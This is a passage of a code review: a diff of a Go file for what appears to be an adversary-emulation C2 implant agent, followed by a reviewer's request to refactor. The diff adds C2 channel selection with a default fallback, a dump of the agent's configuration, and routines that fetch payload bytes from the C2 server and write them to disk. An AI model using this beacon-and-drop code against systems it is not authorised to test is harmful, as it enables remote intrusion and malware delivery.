agent/agent.go

```diff
@@ -0,0 +1,287 @@
+	if len(contact.CommunicationChannels) > 0 {
+		if requestedC2, ok := c2Config["c2Name"]; ok {
+			if err := a.attemptSelectChannel(c2Config, requestedC2); err == nil {
+				return nil
+			}
+		}
+		output.VerbosePrint(fmt.Sprintf("[*] Attempting to fall back to default C2 channel %s", a.defaultC2))
+		if err := a.attemptSelectChannel(c2Config, a.defaultC2); err == nil {
+			return nil
+		}
+	}
+	return errors.New("No possible communication channels found.")
+}
+
+// Attempts to set a given C2 channel for the agent.
+func (a *Agent) attemptSelectChannel(c2Config map[string]string, requestedChannel string) error {
+	coms, ok := contact.CommunicationChannels[requestedChannel]
+	if !ok {
+		return errors.New(fmt.Sprintf("%s channel not available", requestedChannel))
+	}
+	if coms.C2RequirementsMet(a.GetFullProfile(), c2Config) {
+		a.beaconContact = coms
+		a.heartbeatContact = coms
+		output.VerbosePrint(fmt.Sprintf("[*] Set communication channel to %s", requestedChannel))
+		return nil
+	}
+	return errors.New(fmt.Sprintf("%s channel available, but requirements not met.", requestedChannel))
+}
+
+// Outputs information about the agent.
+func (a *Agent) Display() {
+	output.VerbosePrint(fmt.Sprintf("initial delay=%d", int(a.initialDelay)))
+	output.VerbosePrint(fmt.Sprintf("server=%s", a.server))
+	output.VerbosePrint(fmt.Sprintf("group=%s", a.group))
+	output.VerbosePrint(fmt.Sprintf("privilege=%s", a.privilege))
+	output.VerbosePrint(fmt.Sprintf("allow p2p receivers=%v", a.enableP2pReceivers))
+	output.VerbosePrint(fmt.Sprintf("beacon channel=%s", a.beaconContact.GetName()))
+	output.VerbosePrint(fmt.Sprintf("heartbeat channel=%s", a.heartbeatContact.GetName()))
+}
+
+// Will download each individual payload listed, write them to disk,
+// and will return the full file paths of each downloaded payload.
+func (a *Agent) DownloadPayloads(payloads []interface{}) []string {
+	var droppedPayloads []string
+	availablePayloads := reflect.ValueOf(payloads)
+	for i := 0; i < availablePayloads.Len(); i++ {
+		payload := availablePayloads.Index(i).Elem().String()
+		location := filepath.Join(payload)
+		obtainedPayload := false
+		if fileExists(location) == false {
+			output.VerbosePrint(fmt.Sprintf("[*] Fetching new payload bytes: %s", payload))
+			payloadBytes := a.beaconContact.GetPayloadBytes(a.GetTrimmedProfile(), payload)
+			if len(payloadBytes) > 0 {
+				if err := writePayloadBytes(location, payloadBytes); err != nil {
+					output.VerbosePrint(fmt.Sprintf("[-] Error when writing payload bytes: %s", err.Error()))
+				} else {
+					obtainedPayload = true
+				}
+			}
+		} else {
+			obtainedPayload = true
+		}
+		if obtainedPayload {
+			droppedPayloads = append(droppedPayloads, location)
+		}
+	}
+	return droppedPayloads
+}
+
+// Will request payload bytes from the C2 for the specified payload and return them.
+func (a *Agent) FetchPayloadBytes(payload string) []byte {
+	return a.beaconContact.GetPayloadBytes(a.GetTrimmedProfile(), payload)
+}
```

Comment:
These can definitely be cleaned up/split into smaller functions that support each other.  Check out what I did for the CommunicationsChannel and that should help steer you.